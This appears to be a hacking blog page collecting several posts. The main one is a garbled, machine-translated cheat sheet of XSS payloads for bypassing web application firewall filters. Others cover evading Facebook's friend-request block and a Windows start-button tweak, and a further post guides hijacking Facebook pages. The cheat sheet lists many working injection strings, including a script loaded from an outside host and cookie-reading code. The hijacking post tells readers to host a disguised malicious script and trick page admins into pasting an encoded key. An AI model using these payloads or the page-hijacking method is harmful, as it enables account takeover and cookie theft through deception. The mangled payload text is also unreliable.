Bypass WAF XSS Filters

This article comes from the "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters" which bypass xss filter section, in front of a feature according to WAF WAF determine which test method to skip, and a look behind the focus around some basic xss testing process, although it is around the WAF, but here is based on the regular WAF defect to bypass testing methods, not agreement on the issue, so, basically xss filter can be common to other scenarios.Relatively easy to novices quickly learned some of the basic methods of testing xss.

Bypassing Blacklists
Most of the sites are done using blacklists to filter, there are three ways to bypass blacklist tests:

1> A violent test (input large amounts of payload, see return results) 2> according to the regular projections 3> using a browser bug

Preliminary tests

1) try to insert more normal HTML tags, such as: <b>, <i>, <u> look at the situation return to the page is like, whether HTML coding, or the label is filtered.

2) Try to insert tags are not closed, for example: <b, <i, <u, <marquee and then look back a response, whether open label also has filtering.

3) Then test of several XSS payload, basically all the xss filter will be filtered:

<Script> alert (1); </ script>
<Script> prompt (1); </ script>
<Script> confirm (1); </ script>
<Scriptsrc = "http://rhainfosec.com/evil.js">

See returns response is filtered all, or only a portion of the filter, if also left alert, prompt, confirm the characters, then try the case of a combination of:

<ScRiPt> alert (1); </ scrIPt>

4) If the filter is only the <script> and </ script> tag filtered out, then you can use

<Scr <script> ipt> alert (1) </ scr <script> ipt>

The way to get around, so that when the <script> tag is filtered out, leaving just combined to form a full payload.

5) with <a href tag to test to see if the response is returned

<a href="http://www.google.com"> Clickme </a>

<A href tag is being filtered by the filter if href whether data is filtered in

If no data is filtered, insert the javascript protocol to see:

<a href="javascript:alert(1)"> Clickme </a>

Whether to return an error if javascript entire contents of the agreement have been filtered out, or just filter under the javascript character case conversion attempt

Continue to test events trigger the execution of javascript:

<a href="rhainfosec.com" onmouseover=alert(1)> ClickHere </a>

To see whether the onmouseover event is filtered. Testing an invalid event, watching filtering rules:

<a href="http://www.madleets.com" onclimbatree=alert(1)> ClickHere </a>

Is a complete return to it, or just like onmouseover is blown away.

If it is full, then it is returned, it means, do a blacklist of events, but in HTML5, there are more than 150 kinds of ways to execute javascript code to test a rare event event:

<Body / onhashchange = alert (1)> <a href=#> clickit

Test other tag

The next test other tag with attributes

Src attribute

<Img src = x onerror = prompt (1);>
<Img / src = aaa.jpg onerror = prompt (1);> 
<Video src = x onerror = prompt (1);>
<Audio src = x onerror = prompt (1);>

iframe tag

<Iframe src = "javascript: alert (2)">
<Iframe / src = "data: text & sol; html; & Tab; base64 & NewLine;, PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg ==">

embed tag

<Embed / src = // goo.gl/nlX0P>

action attribute

Use <form, <isindex other labels in the action attribute execute javascript

<Form action = "Javascript: alert (1)"> <input type = submit>
<Isindex action = "javascript: alert (1)" type = image>
<Isindex action = j & Tab; a & Tab; vas & Tab; c & Tab; r & Tab; ipt: alert (1) type = image>
<Isindex action = data: text / html, type = image>
<Formaction = 'data: text & sol; html, & lt; script & gt; alert (1) & lt / script & gt'> <button> CLICK

formaction property

<Isindexformaction = "javascript: alert (1)" type = image>
<Input type = "image" formaction = JaVaScript: alert (0)>
<Form> <button formaction = javascript & colon; alert (1)> CLICKME

background properties

<Table background = javascript: alert (1)> </ table> // effective in Opera 10.5 and IE6

poster Properties

<Video poster = javascript: alert (1) //> </ video> // Opera 10.5 or less effective

data attributes

<Object data = "data: text / html; base64, PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4 =">
<Object / data = // goo.gl/nlX0P?

code attribute

<Applet code = "javascript: confirm (document.cookie);"> // Firefox effective
<Embed code = "http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess = always>

Event triggers

<Svg / onload = prompt (1);>
<Marquee / onstart = confirm (2)> /
<Body onload = prompt (1);>
<Select autofocus onfocus = alert (1)>
<Textarea autofocus onfocus = alert (1)>
<Keygen autofocus onfocus = alert (1)>
<Video> <source onerror = "javascript: alert (1)">

The shortest test vectors

<Q / oncut = open ()>
<Q / oncut = alert (1)> // in place to limit the length of a very effective

Nesting

<Marquee <marquee / onstart = confirm (2)> / onstart = confirm (1)>
<Bodylanguage = vbsonload = alert-1 // IE8 effective
<Command onmouseover
= "\ X6A \ x61 \ x76 \ x61 \ x53 \ x43 \ x52 \ x49 \ x50 \ x54 \ x26 \ x63 \ x6F \ x6C \ x6F \ x6E \ x3B \ x63 \ x6F \ x6E \ x6 6 \ x69 \ x72 \ x6D \ x26 \ x6C \ x70 \ x61 \ x72 \ x3B \ x31 \ x26 \ x72 \ x70 \ x61 \ x72 \ x3B "> Save </ command> // IE8 effective

Under the circumstances the filter brackets

When the brackets are filtered when you can use the throw to bypass

<a onmouseover="javascript:window.onerror=alert;throw 1>
<Img src = x onerror = "javascript: window.onerror = alert; throw 1">

These two test vectors in Chrome with IE on top there will be a "uncaught" error, you can use the following vectors:

<Body / onload = javascript: window.onerror = eval; throw '= alert \ x281 \ x29';>

expression attribute

<Img style = "xss: expression (alert (0))"> // IE7 following
<Div style = "color: rgb ('' & # 0; x: expression (alert (1))"> </ div> // IE7 following
<Style> #test {x: expression (alert (/ XSS /))} </ style> // IE7 following

location attribute

<a onmouseover=location='javascript:alert(1)'> click
<Body onfocus = "loaction = 'javascript: alert (1)'"> 123

Some other payload

<Meta http-equiv = "refresh" content = "0; url = // goo.gl/nlX0P">
<Meta http-equiv = "refresh" content = "0; javascript & colon; alert (1)" />
<Svg xmlns = "http://www.w3.org/2000/svg"> <g onload = "javascript: \ u0061lert (1);"> </ g> </ svg>
<Svg xmlns: xlink = "http://www.w3.org/1999/xlink"> <a> <circle r = 100 /> <animate attributeName = "xlink: href" values ​​= "; javascript: alert (1 ) "begin =" 0s "dur =" 0.1s "fill =" freeze "/>
<Svg> <! [CDATA [> <imagexlink: href = "]]> <img / src = xx: xonerror = alert (2) //"> </ svg>
<Meta content = "& NewLine; 1 & NewLine ;; JAVASCRIPT & colon; alert (1)" http-equiv = "refresh" />
<Math> <a xlink:href="//jsfiddle.net/t846h/"> click

When = ();: When is filtered

<Svg> <script> alert & # 40/1 / & # 41 </ script> // pass to kill all browsers

opera can not close

<Svg> <script> alert & # 40 1 & # 41 // Opera to be investigated

Entity encoding

In many cases the entity will be encoded input data WAF users,

javascript is a very flexible language, you can use a lot of coding, such as Hex, Unicode and HTML. However, these codes can also be used in which position provisions:

Attributes:

href =
action =
formaction =
location =
on * =
name =
background =
poster =
src =
code =

Supported encoding: HTML, octal, decimal, hexadecimal and Unicode

Attributes:

data =

Supported encoding: base64

Filtering based on context

WAF biggest problem is that I do not know the context of the output of the position, resulting in specific environments can be bypassed.

Enter in the property

<Input value = "XSStest" type = text>

Controllable position XSStest, you can use

"> <Img src = x onerror = prompt (0);>

If <> is filtered, then you can be replaced

"Autofocus onfocus = alert (1) //

Similarly there are many other payload:

"Onmouseover =" prompt (0) x = "
"Onfocusin = alert (1) autofocusx ="
"Onfocusout = alert (1) autofocus x ="
"Onblur = alert (1) autofocusa ="

Enter the script tag

For example:

<Script>
Var x = "Input";
</ Script>

Controllable position Input, you can close the script tag to insert the code, but also we just closed the double quotes can execute js code

"; Alert (1) //

The end result is

<Script>
Var x = ""; alert (1) //
</ Script>

Unconventional event listener

For example:

"; Document.body.addEventListener (" DOMActivate ", alert (1)) //
"; Document.body.addEventListener (" DOMActivate ", prompt (1)) //
"; Document.body.addEventListener (" DOMActivate ", confirm (1)) //

The following are some of the same categories:

DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

HREF content controllable

For example:

<a href="Userinput"> Click </a>

Controllable is Userinput where we need to do is enter the javascript code like:

javascript: alert (1) //

Finally, the combination of:

<a href="javascript:alert(1)//"> Click </a>

Transform

URL encoded using HTML entities to bypass the blacklist, href where the entity will automatically decode, if all else fails, you can try using vbscript in IE10 below are valid, or use the data protocol.

JavaScript transformation

When using the javascript protocol can use examples:

javascript & # 00058; alert (1)
javaSCRIPT & colon; alert (1)
JaVaScRipT: alert (1)
javas & Tab; cript: \ u0061lert (1);
javascript: \ u0061lert & # x28; 1 ​​& # x29
javascript & # x3A; alert & lpar; document & period; cookie & rpar;

Vbscript transformation

vbscript: alert (1);
vbscript & # 00058; alert (1);
vbscr & Tab; ipt: alert (1) "
Data URl
data: text / html; base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg ==

JSON

When you enter will be displayed in the encodeURIComponent them, it is very easy to insert xss code

encodeURIComponent ('userinput')

userinput at controllable, test code:

-alert (1) -
-prompt (1) -
-confirm (1) -

The end result:

encodeURIComponent ("- alert (1) -")
encodeURIComponent ("- prompt (1) -")

SVG tag

When returning results when the svg tag, there will be a feature

<Svg> <script> varmyvar = "YourInput"; </ script> </ svg>

YourInput controllable input

www.site.com/test.php?var=text";aler
t(1)//

If the "coding some he is still able to perform:

<Svg> <script> varmyvar = "text & quot ;; alert (1) //"; </ script> </ svg>

Browser bug

Charset bug in IE appear many times, the first one is UTF-7, but this is only available in previous versions, you can now discuss the javascript executed in a browser now among.

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

This page which we controlled the character set of the current page, when our regular tests:

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v="><img src = x onerror = prompt (0);>

Return result can be seen in double quotes were coded:

<Html>
<Meta charset = "utf-8"> </ meta>
<Body>
<Input type = "text" value = "& quot; & gt; & lt; img src = x onerror = prompt (0); & gt;"> </ input>
</ Body>
</ Html> 

Set the character set is UTF-32:

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1 )% E3% B0% 80 / script% E3% B8% 80

The above can be performed successfully in IE9 and below.

Use 0 bytes bypass:

<Scri% 00pt> alert (1); </ scri% 00pt>
<Scri \ x00pt> alert (1); </ scri% 00pt>
<S% 00c% 00r% 00% 00ip% 00t> confirm (0); </ s% 00c% 00r% 00% 00ip% 00t>

In the following version IE9 and effective.

Read More

Change Your Windows 7 Start Button With any Picture

Steps For Trick

1. First Download the Tools From Here

Download

2. Extract It And run As Administrator

3. Check Enable Start Orb Loader.

4. Click Browse and browse for the folder in which your start orb bitmaps are.

5. Select your desired orb from the orb list.

6. If you want to access the app directly from your desktop context menu, click Shell integration.

7. Click Save Changes.

Now your start button will be changed. Just log off and log in to see the new orb.

Read More

Post Your Blog Posts To Your Facebook Wall Automatically

A wordpress Plugin Allow To cross-post your blog posts to your Facebook Wall. Your Facebook “Boxes” tab will show your most recent blog posts.

Download Plugin

Read More

Friend Request Blocked? Send Friend Request When Blocked For 30 or 7 Days

Now You can Send Friend Request When Blocked From Sending By Facebook for 7 or 30 Days

Like This

Now You can Send Friend Request When Blocked From Sending By Facebook for 7 or 30 Days

Like This

Steps To Send Friend Request When Blocked

1. Get the person’s email address first. Come on guys its not so difficult.

2. Visit Add Personal Contacts as Friends

3. Here you can send friend request even if your are blocked by using their email address.

4. If you want to send friend request to lot’s of friends here is an quick and easy way to do this.

5. Open up a new notepad file, paste all your friends email separated by comma (,)

6. Save the notepad file with the extension .vcf

7. This is your list of your contact files containing your friends email address.

8. Visit the Facebook page to add your vcf file

9. Go to Add Personal Contacts as Friends click on the last option other tools there you can find upload contact file.

10. Browse your .vcf file and upload to the Facebook link given above.

11. It will send request to your friends by email automatically.

Just to make sure this method really works when you are blocked, I went ahead and got myself blocked for 2 days, and tried the above steps. Yep, you guess it right. It did work for me and I was able to send 3 requests at the same time using the .vcf file.

Congo! 

Read More

Facebook Page Hacking

Todays i am getting alot of complains about Facebook Page Hacking from readers 

It is very easy to Hack Facebook Page but also very hard without my article.However it's a simple facebook bug which helps the admins to remove another admin. However facebook should set up a rule that the original admins should not be removed.

However it's quite strange to see according to facebook help page, Primary or original admin cannot be removed. However it's untrue. Which evolves the whole idea of Hijacking facebook fan pages.

Let's Go...

Things we shall need:

1.  Hack Facebook page exploit.
2. A free hosting.
3. A key or script to run that "Facebook page hacking exploit.".
4. Your Facebook email id.
5. Brain ( A bit ;) )

I will try to be simple, but if you don't get anything then kindly ask at comment below.

1. Facebook Admin Page Hacking Exploit:

a) Editing the facebook admin page hack exploit:

First of all see your facebook email id which you used to signup at facebook, see pic below that's the pic of exploit:

Now change the highlighted id to your's facebook id.

2. Get free hosting:

Well t35 and 110mb won't help you in this hack :P better go to 000webhost.com and 0fees.net. 

Upload the exploit and I recommend change its name from pagehack.js to fanbooster.js or something more attracting.

3. Using the exploit by Key or script: 

There will be a text file in the downloaded package, named as Key for pagehack.txt open it, You will get a script in it, Now the main thing is social engineering, its up to you that how you give him key, Well Change the following part in the key to your own script path:

Change this to your hosting , and also change the exploit name in this key if you have changed it while uploading as suggesting.

Tip: Encode this in ASCII format, Victim might not know what is this.

Now, Give the key to victim (He must be admin of page) and ask him to paste this in browser address bar

Tip: Tell him that it will make your page safe, or something else like attracting

When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.

Enjoy the Facebook Admin Page Hack, But don't hack for bad cause.

Download this exploit from the link below.

Now, After downloading it you will get key inside it also, and also the exploit.

First we have to edit it,and you will easily understood rest of the things.

http://docketupload.com/file/afcf0

Read More